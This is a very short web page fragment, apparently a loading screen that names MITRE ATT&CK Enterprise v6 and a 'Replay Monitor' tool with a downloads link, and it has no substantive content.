MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads